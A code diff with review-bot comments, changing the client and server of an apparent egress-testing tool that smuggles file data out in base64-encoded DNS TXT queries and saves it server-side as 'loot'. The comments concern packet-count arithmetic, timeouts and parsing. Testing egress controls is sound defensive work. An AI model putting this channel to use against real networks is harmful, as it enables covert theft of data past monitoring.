diff --git a/protocols/clients/dns_resolved.py b/protocols/clients/dns_resolved.py index eb2a7b5..83c9b03 100644 --- a/protocols/clients/dns_resolved.py +++ b/protocols/clients/dns_resolved.py @@ -20,28 +20,17 @@ class Client: self.protocol = "dns_resolved" self.remote_server = cli_object.ip self.max_length = 68 + self.current_total = 0 if cli_object.file is None: self.file_transfer = False self.length = 50 else: - self.length = 30 + self.length = 24 if "/" in cli_object.file: self.file_transfer = cli_object.file.split("/")[-1] else: self.file_transfer = cli_object.file - def dns_encode(outgoing_data): - # This function from http://bb.secdev.org/scapy/issue/500/les-r-ponses-dns-de-type-txt-sont-malform - for i in range(0, len(outgoing_data), 0xff+1): - outgoing_data = outgoing_data[:i] + chr(len(outgoing_data[i:i+0xff])) + outgoing_data[i:] - return outgoing_data - - def randomKey(b=20): - """ - Returns a random string/key of "b" characters in length, defaults to 32 - """ - return ''.join(random.choice(string.ascii_letters + string.digits) for x in range(b)) - def transmit(self, data_to_transmit): byte_reader = 0 
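Review bot: The chunk size in `Client.__init__` drops from `30` to `24` with no comment, next to the equally bare `50` and `self.max_length = 68`, so a reader cannot tell how the three relate. The later hunk shows `transmit()` shrinking `self.length` until the encoded name fits `max_length`, so I would state that on the assignment: `# payload bytes per query before base64; transmit() lowers this until the name fits max_length`. The new `self.current_total = 0` is used further down as a "not computed yet" marker and deserves `# 0 = total not yet calculated; set on the first packet in transmit()`. `__init__` starts outside this hunk.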
@@ -78,22 +67,34 @@ class Client: encoded_data = base64.b64encode(str(packet_number) + ".:|:." + data_to_transmit[byte_reader:byte_reader + self.length]) encoded_data = encoded_data + "." + self.remote_server + # calcalate total packets + if (((len(data_to_transmit) - byte_reader) % self.length) == 0): + packet_diff = (len(data_to_transmit) - byte_reader) / self.length + else: + packet_diff = ((len(data_to_transmit) - byte_reader) / self.length) + while len(encoded_data) > self.max_length: self.length -= 1 # calcalate total packets if (((len(data_to_transmit) - byte_reader) % self.length) == 0): - packet_diff = (len(data_to_transmit) - byte_reader) / self.length + packet_diff2 = (len(data_to_transmit) - byte_reader) / self.length else: - packet_diff = ((len(data_to_transmit) - byte_reader) / self.length) + packet_diff2 = ((len(data_to_transmit) - byte_reader) / self.length) check_total = True encoded_data = base64.b64encode(str(packet_number) + ".:|:." + data_to_transmit[byte_reader:byte_reader + self.length]) encoded_data = encoded_data + "." + self.remote_server if check_total: - self.current_total = packet_number + packet_diff + self.current_total = packet_number + packet_diff2 check_total = False + else: + if self.current_total == 0: + self.current_total = packet_diff + else: + pass + print "[*] Packet Number/Total Packets: " + str(packet_number) + "/" + str(self.current_total) # Craft the packet with scapy @@ -103,10 +104,10 @@ class Client: if '=' in encoded_data: encoded_data = encoded_data.replace('=', '-pqp-') - response_packet = sr1(IP(dst=nameserver)/UDP()/DNS( + response_packet = sr1(IP(dst=nameserver, ttl=10)/UDP()/DNS( rd=1, id=15, opcode=0, qd=[DNSQR(qname=encoded_data, qtype="TXT")], aa=1, qr=0), - verbose=False, timeout=2) + verbose=False, timeout=8) if response_packet: if response_packet.haslayer(DNSRR): diff --git a/protocols/servers/dns_resolved.py b/protocols/servers/dns_resolved.py index b0173c4..e3b44c4 100644 
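Review bot: Both arms of the added `if (((len(data_to_transmit) - byte_reader) % self.length) == 0)` test evaluate the same expression, so the remainder case is never rounded up. The printed total therefore under-counts whenever the remaining data is not a multiple of `self.length` (assuming Python 2 integer division, which the `print` statement implies). The same duplicated pair is kept inside the `while` loop as `packet_diff2`. One ceiling division replaces each pair: `packet_diff = (len(data_to_transmit) - byte_reader + self.length - 1) // self.length`. The `else: pass` under `if self.current_total == 0:` can go, and "calcalate" in both comments should read "calculate". `transmit` begins and ends outside this hunk, so whether `check_total` is initialised before the loop cannot be confirmed from here.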
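Review bot: `ttl=10` and `timeout=8` in the `sr1(...)` call are unexplained literals, and the TTL changes what a test run can conclude. A query to a nameserver more than ten hops away is dropped in transit and reaches `if response_packet:` as an ordinary timeout. Someone reading the results cannot tell that apart from egress filtering having blocked the query. Give both values names with a one-line reason, for example `DNS_QUERY_TTL = 10  # hop limit for outgoing queries` and `DNS_REPLY_TIMEOUT = 8  # seconds to wait for the TXT answer`, or take them from `cli_object`. `transmit` continues past the end of the hunk, so how a missing reply is reported is not visible here.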
--- a/protocols/servers/dns_resolved.py +++ b/protocols/servers/dns_resolved.py @@ -16,7 +16,6 @@ class Server: def __init__(self, cli_object): self.protocol = "dns_resolved" - self.last_packet = '' self.file_name = '' self.loot_path = '' self.file_dict = {} 
@@ -42,24 +41,26 @@ class Server: incoming_data = base64.b64decode(string_to_decode) if ".:|:." in incoming_data: self.file_status = incoming_data.split('.:|:.')[0] - file_data = incoming_data.split('.:|:.')[1] - self.file_dict[self.file_status] = file_data + if self.file_status in self.file_dict: + pass + else: + file_data = incoming_data.split('.:|:.')[1] + self.file_dict[self.file_status] = file_data - outgoing_data = self.file_status + "allgoodhere" + outgoing_data = self.file_status + "allgoodhere" - # This function from http://bb.secdev.org/scapy/issue/500/les-r-ponses-dns-de-type-txt-sont-malform - for i in range(0, len(outgoing_data), 0xff+1): - outgoing_data = outgoing_data[:i] + chr(len(outgoing_data[i:i+0xff])) + outgoing_data[i:] + # This function from http://bb.secdev.org/scapy/issue/500/les-r-ponses-dns-de-type-txt-sont-malform + for i in range(0, len(outgoing_data), 0xff+1): + outgoing_data = outgoing_data[:i] + chr(len(outgoing_data[i:i+0xff])) + outgoing_data[i:] - send(IP(dst=packet[IP].src)/UDP(dport=packet[UDP].sport, sport=53)/DNS(rd=1, id=packet[DNS].id, qr=1, - qd=[DNSQR(qname=dnsqr_strings.split('\'')[1].rstrip('.'), qtype=packet[DNSQR].qtype)], - an=[DNSRR(rrname=dnsqr_strings.split('\'')[1].rstrip('.'), rdata=outgoing_data, type=packet[DNSQR].qtype)]), - verbose=False) + send(IP(dst=packet[IP].src)/UDP(dport=packet[UDP].sport, sport=53)/DNS(rd=1, id=packet[DNS].id, qr=1, + qd=[DNSQR(qname=dnsqr_strings.split('\'')[1].rstrip('.'), qtype=packet[DNSQR].qtype)], + an=[DNSRR(rrname=dnsqr_strings.split('\'')[1].rstrip('.'), rdata=outgoing_data, type=packet[DNSQR].qtype)]), + verbose=False) else: with open(self.loot_path + self.file_name, 'a') as dns_out: dns_out.write(encoded_data) - self.last_packet = encoded_data except TypeError: pass
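Review bot: The payload is still taken with `incoming_data.split('.:|:.')[1]`, which silently truncates any chunk whose data itself contains the `.:|:.` marker; splitting once keeps the whole chunk, `self.file_status, file_data = incoming_data.split('.:|:.', 1)`. The new duplicate check reads more directly as `if self.file_status not in self.file_dict:` than as `if ...: pass / else:`. The re-indented `outgoing_data`/`send(...)` lines appear to sit inside that new `else`, though the indentation is not recoverable from this view. If so, a retransmitted chunk is never acknowledged again, which is worth confirming against the client's retry logic. `file_dict` is keyed by a string taken from the query with no visible bound, so note in a comment that any host able to reach port 53 can add entries. The enclosing method starts before this hunk.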